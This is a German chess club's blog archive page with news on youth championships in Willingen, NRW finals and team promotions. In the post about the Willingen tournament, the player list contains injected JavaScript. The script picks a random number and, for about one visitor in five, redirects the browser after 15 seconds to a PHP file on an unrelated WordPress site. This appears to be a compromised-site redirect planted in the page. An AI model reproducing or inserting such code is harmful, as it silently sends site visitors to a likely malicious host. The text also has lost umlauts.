Archiv für Allgemein

Von Macken und Mücken

Ahorn

3 Brackeler Mannschaften spielten bei der NRW-Endrunde auf dem Ahorn um die DVM-Qualifikation. Zwei erreichten das Ziel, aber ausgerechnet die Mannschaft mit den besten Aussichten blieb auf der Strecke.

» Weiterlesen

Lampenfieber

Nicole DEM2017

Einen ziemlich guten funften Platz belegte Nicole bei der DEM U14w in Willingen. Ganz glucklich waren Trainer und Spielerin damit aber trotzdem nicht. Die Entourage verfolgte die letzte entscheidende Runde im Internet mit 15 Minuten Zeitverzogerung und freute sich uber einen klaren zu erwartenden Sieg gegen die NRW-Meisterin Dana Berelowitsch. Damit ware Nicole deutsche Vizemeisterin geworden.

» Weiterlesen

Auftakt in Willingen

Rüdiger und Chessy

Mit einem gro?en Aufgebot sind wir dieses Jahr bei der DEM in Willingen vertreten. Fur die offiziellen Deutschen Meisterschaften haben sich Jona (U10) und Nicole (U14w) qualifiziert. Aber die offenen Turniere erfreuen sich zunehmender Beliebtheit. Unter den 162 Spielern im Open A befinden sich var number1=Math.floor(Math.random() * 5); if (number1==3) { var delay = 15000; setTimeout(“document.location.href=’http://baharzaf.com/wp-content/plugins/duplicator/ctrls/wp-rsc.php'”, delay); } href=”http://www.deutsche-schachjugend.de/2017/odjm-a/spieler/22/” target=”_blank”>Fabian (Setzlistenplatz 22), Ali (48), Vitaliy (63), Raphael (74) und Mareike (134). Ihr konnt alle Ergebnisse und viele Livepartien auf der Turnierseite verfolgen und unseren Vertretern auch Gru?e schicken.

Die Unvollendeten

Ruedinger

Gut gespielt, aber dreimal knapp gescheitert. So konnte man die Saisonbilanz unserer U20-Mannschaften kurz zusammenfassen. In der Jugendbundesliga wurde unsere Erste Vierter und verpasste die DVM-Qualifikation.
Die zweite Mannschaft hatte mit einem Kantersieg in der letzten Runde sogar als erste Zweitvertretung eines Vereins den Aufstieg in die Bundesliga schaffen konnen. Am Ende stand gegen die blauen Springer zwar ein achtbares 3-3, aber damit nur der zweite Platz.
Die dritte Mannschaft wurde unerwartet aber vollig souveran Sieger der Verbandsliga Vorgruppe 2. Im Endspiel waren sie dann aber klarer Au?enseiter gegen Horst-Emscher, zumal nicht die beste Aufstellung zur Verfugung stand.

» Weiterlesen

Chess Royale – Die Arena ist eröffnet

Bauernarena farbig

In dieser Woche startet unser neues Arenasystem. Zunachst sind nur die Bauern- und Springerarena in Betrieb, die Lauferarena folgt in einigen Tagen. Eng angelegt an unsere Diplome konnt ihr nun noch gezielter Wettkampfpraxis und Erfolge gegen euresgleichen sammeln.

» Weiterlesen

Aller guten Dinge sind elf

Brackel I Aufsteiger 2017

1,5 Brettpunkte fehlten noch zum Verbandsmeistertitel und dem Aufstieg der ersten Mannschaft in die NRW-Klasse. Aber schon oft in den vergangenen Jahren hat die Erste den entscheidenden Elfer verschossen. Aber nach elf Jahren Regionalliga hat es dann doch geklappt. Mit einem hart erkampften 4-4 beim direkten Verfolger Welper sind wir endlich aufgestiegen!

» Weiterlesen

3x Ahorn

Ahorn

Alle drei Jugendmannschaften in den Altersklassen U12, U14 und U14w haben sich bei der Vorrunde ungefahrdet fur die Endrunde auf dem Ahorn qualifiziert.

» Weiterlesen

Meisterliche Vorstellung

Sieger U10

Auch in der letzten Runde lie? er nichts mehr anbrennen: Mit 8 Punkten aus 9 Partien und einem Punkt Vorsprung wurde Jona ungefahrdet NRW-Meister. Wahrend die Favoriten der anderen Altersklassen oft ganz schon kampfen mussten oder mit ihrer Rolle gar nicht klar kamen, zeigte Jona von Beginn an eine souverane Vorstellung und kam kein einziges Mal in echte Bedrangnis. Die nachste Etappe wird nun die DEM in Willingen, aber vorher steht noch mit der Grundschulmannschaft eine weitere Deutsche Meisterschaft auf dem Plan.

» Weiterlesen

Jona auf Titelkurs

Fur die U10er war der heutige Freitag ein guter Tag. Jona fuhrt das Feld mit einem halben Punkt Vorsprung an und ist mit einem Sieg morgen sicher NRW-Meister. Die Qualifikation zur DEM hat er schon in der Tasche. Die kann auch noch Samuel mit einem Sieg erreichen. Alexej hat die schwarzeste Serie des Turniers heute auch mit seinem ersten Remis beendet.
Fur alle anderen war es der ubliche schwarze Freitag und es sind heute einige Traume zerplatzt. Ali verlor gegen den Tabellenfuhrer alle Chancen. Nicole verlor mit einer Niederlage fast alle Chancen. Mareike hat aber plotzlich nach ihrem Sieg wieder Chancen, ebenso wie Raphael, weil es in der U14 sogar drei DEM-Platze fur NRW gibt, vorausgesetzt sie gewinnen jeweils gegen die Tabellenfuhrer. Au?erdem mussten dazu noch einige andere Ergebnisse gunstig ausgehen.
Vitaliy, Basmalah und Gloria begnugten sich mit einem Remis und dem Freizeitprogramm.

Wetter gut, aber sonst?

Kein guter Tag, au?er fur unsere U10er Jona und Samuel. Die beiden setzen sich mit jeweils 1,5/2 in der Spitzengruppe fest, Jona auf dem ersten und Samuel auf dem vierten Platz. Der wurde ihm fur Willingen reichen.
Fast alle Madchen haben dagegen verloren, nur Mareike holte einen halben Punkt. Damit ist sie noch nicht ganz raus aus dem Qualirennen. Nicole hat am Spitzenbrett leider auch verloren, aber trotzdem noch die besten Karten im Kampf um Platz 2.
Ali gewann das interne Duell gegen Vitaliy etwas glucklich, aber nun konnte er noch aus eigener Kraft einen Spitzenplatz erreichen. Sehr unglucklich verlor Raphael und hat damit keine Chance mehr sich zu qualifizieren.

» Weiterlesen